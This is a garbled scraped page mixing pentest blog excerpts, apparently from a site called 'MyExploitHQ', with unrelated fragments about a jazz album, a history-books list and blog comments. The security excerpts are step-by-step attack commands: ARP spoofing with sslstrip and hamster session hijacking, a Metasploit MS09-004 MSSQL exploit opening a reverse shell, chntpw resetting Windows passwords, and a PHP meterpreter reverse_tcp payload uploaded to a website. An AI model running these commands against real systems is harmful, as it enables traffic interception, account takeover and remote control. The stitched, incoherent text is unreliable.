1. echo 1 > /proc/sys/net/ipv4/ip_foward arpspoof -i eth0 -t 192.168.1.104 192.168.1.1 2. ip tables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 10000 sslstrip -p -k -f 3. /pentest/sniffers/hamster/ferret -i eth0 4. /pentest/sniffers/hamster/hamster 5. Firefox set proxy to 127.0.0.1 port 1234 6. http://hamster press refresh and any person on 192.168.1.1 network… Continue reading Don’t Try This at Home is the second album by the American jazz saxophonist
msf exploit(ms09_004_sp_replwritetovarbin) > use exploit/windows/mssql/ms09_004_sp_replwritetovarbin msf exploit(ms09_004_sp_replwritetovarbin) > set lhost Tester-IP-Address msf exploit(ms09_004_sp_replwritetovarbin) > set rhost Client-IP-Address msf exploit(ms09_004_sp_replwritetovarbin) > exploit [*] Started reverse handler on Tester-IP-Address:4444 [*] Attempting automatic target detection… [*] Automatically detected target “MSSQL 2005 SP0 (9.00.1399.06)” [*] Redirecting flow to 0x10e860f via call to our faked vtable ptr @ 0x2201ca8 [*]… Continue reading 10,523 Important People Who Were Screwed Out of History Books ….
29 Mar 2012 – 3 Responses to Thank you to all our supporters! Annabelle From Sanibel says: March 29, 2012 at 10:04 pm. Kate…. never apologize for doing … 12 Mar 2012 – 22 followers…REALLY I have…I love it.. I typed that with a Welsh accent!!! So I seen Wanderlust today who said she had… Continue reading … If you are making fun of people who use “SQL” to mean “MS SQL Server”, that’s very funny.
Backtrack 5 R1 /pentest/passwords/chntpw ./chntpw -l /media/WINDOWS/system32/config/SAM 1 – Clear (blank) user password 2 – Edit (set new) user password (careful with this on XP or Vista) 3 – Promote user (make user an administrator) (4 – Unlock and enable user account) [seems unlocked already] q – Quit editing user, back to user select Select:… Continue reading Your search – root@bt:/pentest/passwords/chntpw# ./chntpw did not match any documents. Suggestions:
1.Using msfpayload in backtrack 5r1 root@bt:~# msfpayload php/meterpreter/reverse_tcp LHOST=Your-IP-Address LPORT=8080 R > connection.php 2. Connection.php is created in root. 3. Open msfconsole use exploit/multi/handler set PAYLOAD php/meterpreter/reverse_tcp set LHOST Your-IP-Address set LPORT 8080 exploit 4. Upload the file to a website then search for it eg dvwa/hackable/uploads [ ] connection.php 21-Jan-2011 11:06 1.3K 5.… Continue reading inurl:upload
Sites we like. Our daily bookmarks for your inspiration. Follow @Siteswelike. Follow. http://securityhorror.blogspot.se/2012/05/ask-and-you-shall-receive-part-1.html 1991 – Can’t Beat the Real Thing. MyExploitHQ
MyExploitHQ wanted to show our support to all the countries that have viewed this notebook so far! United States United Kingdom India Germany Netherlands France Poland Brazil Canada Spain Italy Portugal Australia Singapore Sweden Algeria Mexico Egypt South Africa Indonesia Turkey Argentina Israel Nigeria Pakistan Ukraine United Arab Emirates Morocco Greece Chile Ireland Saudi… Continue reading 23 Nov 2011 – While You Were Out: Weekly World